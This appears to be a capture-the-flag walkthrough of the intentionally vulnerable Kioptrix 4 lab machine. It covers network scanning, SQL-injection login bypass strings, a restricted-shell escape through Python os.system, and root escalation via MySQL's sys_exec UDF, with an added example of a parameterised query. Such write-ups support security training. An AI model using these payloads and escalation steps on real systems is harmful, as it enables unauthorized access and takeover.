netdiscover -r 192.168.0.0/24
nmap -sS -sV -T4 -AO 192.168.0.4
nikto -host 192.168.0.4 -port 80 -output kioptrix4.html
enum4linux -a 192.168.0.4 | tee e4l.txt
nmap --script smb-enum-users 192.168.0.4 -oA nmapenumusers.txt
nmap --script smb-enum-shares 192.168.0.4 -oA nmapenumshares.txt
dirb http://192.168.0.4 /usr/share/wordlists/dirb/common.txt | tee dirb.txt
vi dirb.txt
Knowing that the john directory existed, based on the results from dirb, I directly opened john/john.php in the browser.
Using the manual process to determine if the web site was vulnerable to SQL injection, I simply added a ' to the Username and Password fields and then clicked the Login button.
Interestingly, I discovered that there was a MySQL database and that the page checklogin.php was being utilized.
Next, I decided to use the discovered SMB usernames with the
blah' OR 1 = 1 -- -
or 'OR'1'='1
SQL injection within the Password field.
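An added illustration, not part of the original write-up, of why the lone quote and the `' OR 1 = 1 -- -` probes above succeed against a login that splices the fields into its SQL string, and why a parameterised query is not affected. It uses an in-memory SQLite table with a constructed `members` row as a stand-in for the MySQL database behind checklogin.php; the table, column and row values are assumptions.

```python
import sqlite3

def _db():
    # Constructed stand-in for the application's user table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.execute("INSERT INTO members VALUES ('john', 'constructed-pw')")
    return conn

def vulnerable_login(username, password):
    """Concatenated query: field contents become part of the SQL text."""
    conn = _db()
    query = ("SELECT username FROM members WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.OperationalError:
        # A lone quote leaves the statement unterminated; the resulting
        # database error is the first sign the page is injectable.
        return "sql_error"
    return rows[0][0] if rows else None

def safe_login(username, password):
    """Same check with bound parameters: input is data, never SQL syntax."""
    conn = _db()
    rows = conn.execute(
        "SELECT username FROM members WHERE username = ? AND password = ?",
        (username, password)).fetchall()
    return rows[0][0] if rows else None
```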
ssh john@192.168.0.3
the account has limited access on shell
Knowing that Python was usually installed on Ubuntu by default, I decided to play around with the following example from the SANS documentation:
python
exit_code = os.system('/bin/sh')
output = os.popen('/bin/sh').read()
After some time, I issued the echo command with the system function of the Python os module in order to call /bin/bash.
echo os.system('/bin/bash');
I tried sudo su, but no luck.
cat /var/www/checklogin.php
I found that the MySQL root password was null.
I checked whether MySQL was running as root or with a different credential:
ps -ef | grep mysql
It was running as root.
MySQL had a module called UDF (User-Defined Function). So, I issued the locate udf command to see if the library was installed on the system.
mysql -u root
select * from mysql.func;
select sys_exec('usermod -a -G admin john');
exit
sudo su
boom... you have root!!
cat /root/congrats.txt